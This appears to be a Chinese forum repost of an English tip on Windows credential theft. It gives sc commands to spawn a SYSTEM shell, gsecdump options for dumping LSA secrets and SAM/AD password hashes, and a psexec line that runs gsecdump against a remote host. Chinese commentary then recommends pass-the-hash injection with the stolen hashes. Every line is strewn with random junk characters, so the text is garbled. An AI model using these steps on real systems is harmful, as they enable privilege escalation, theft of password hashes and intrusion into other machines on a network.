o get a DOS Prompt as NT system:
6 b+ Y; y$ H* u7 t3 g5 a0 C/ S1 b: s- U0 _ I
C:\>sc create shellcmdline binpath= "C:\WINDOWS\system32\cmd.exe /K start" type= own type= interact
% p0 ~, m8 T2 A. @( Q[SC] CreateService SUCCESS. _- O) T1 n" p* Y8 R2 K* v
$ H/ X% Z0 n) Y, j
C:\>sc start shellcmdline- I4 a6 M8 e- \3 o+ w
[SC] StartService FAILED 1053:3 ]# M. G2 s& J
@+ v* y3 ^$ o7 l( s: {, B
The service did not respond to the start or control request in a timely fashion.
4 M/ T( e4 \5 ^% h. T
, q( G! y; }8 y1 @7 QC:\>sc delete shellcmdline/ x7 e% t0 B% h4 J: l
[SC] DeleteService SUCCESS& a" a: I: X3 }
5 z& F/ s; u+ B O9 v
------------4 n4 m g% V7 V+ ^
- p, r; M! Z0 m2 i5 I4 J& K
Then in the new DOS window:
/ H+ h- C3 R( _3 [9 \
4 n7 f$ U1 J7 J/ DMicrosoft Windows XP [Version 5.1.2600], X& m0 _* q$ T/ J
(C) Copyright 1985-2001 Microsoft Corp.* N; ~4 a4 ?9 |! @
' f# V3 {; P4 m7 m. }; \0 ?/ ?5 ZC:\WINDOWS\system32>whoami
* G7 V: f2 v; c7 eNT AUTHORITY\SYSTEM
4 J, a' v, W$ {
/ m; k8 t+ }$ s7 f6 QC:\WINDOWS\system32>gsecdump -h4 m5 \5 [4 g- X/ a# |
gsecdump v0.6 by Johannes Gumbel (链接标记johannes.gumbel@truesec.se)
* W9 _0 W( g4 Q4 w% X2 C1 {8 musage: gsecdump [options]* r( Q8 A# D8 h4 l7 \5 {; c
. o% R7 g! P) k
options:
/ [" B; J$ H! @) q: z: P- ^' N3 X-h [ --help ] show help
0 J$ ?6 k. s s1 E-a [ --dump_all ] dump all secrets
# q7 q# K* A) P' ~8 e-l [ --dump_lsa ] dump lsa secrets4 u" D2 D! l% g. y; D8 b% \
-w [ --dump_wireless ] dump microsoft wireless connections
5 D9 F9 ~2 e! w" z-u [ --dump_usedhashes ] dump hashes from active logon sessions
. v. I9 e- V' c% t-s [ --dump_hashes ] dump hashes from SAM/AD. m, ?! w$ Z, d- X4 {
" w9 M' _& f% m; n2 ?4 W" T
Although I like to use:
# @! J' g2 A) U; H8 O5 g+ t( v- g3 K1 y! o9 ]7 D4 N/ d
PsExec v1.83 - Execute processes remotely
4 U- f6 H7 ]. N) r- g& K/ c( HCopyright (C) 2001-2007 Mark Russinovich
6 g9 a& i# U. o( F( j% BSysinternals - 链接标记[url]www.sysinternals.com[/url]
1 L6 R m# d6 g- }* Y
p( p' i7 H9 U7 }0 i \. D% ~C:\>psexec \\COMPUTER -u user -p password -s -f -c gsecdump.exe -u >Active-HASH.TXT8 D1 Q# o7 Z0 P- b* v# V3 D
4 b6 J' ]2 @' o2 c& v" c$ L& E
to get the hashes from active logon sessions of a remote system.$ E- k; ?; e$ O4 Q+ K: ^$ {! ]
; l7 ^$ @/ W8 n0 _% M9 z
These are a lot better than getting a cachedump of the Cached Credentials because these hashes are LMHashes that can be easily broken with Rainbow Tables.
" S1 m$ }0 k! b4 A- I
5 h8 R9 {) k% w N* z提示一下,可以使用pshtools工具包中的iam,把刚才使用gsecdump抓取出来HASH信息导入本地的lsass进程,来实现hash注入式攻击,还是老外厉害,这下管理员有得忙了,ARP欺骗的时候获得的LM/NThash,还有gethash获得的,其实根本不用破解密码,这个就是利用工具了,原文说的好,不管密码是设置4位还是127位,只要有了hash,100%就能搞定了.5 f5 L! N$ J3 f9 M4 Z
原文出处:链接标记[url]http://truesecurity.se/blogs/mur ... -text-password.aspx[/url]
6 Z1 [6 V' ~2 x% |* y, e' g% y
! Y. m a+ O2 u" D5 u* l我看了下原文出处,貌似是/2007/03/16/郁闷啊,差距。
' \- O+ n- |, B' F( W* I |
发表于 2012-11-6 21:09:29
收藏
支持
反对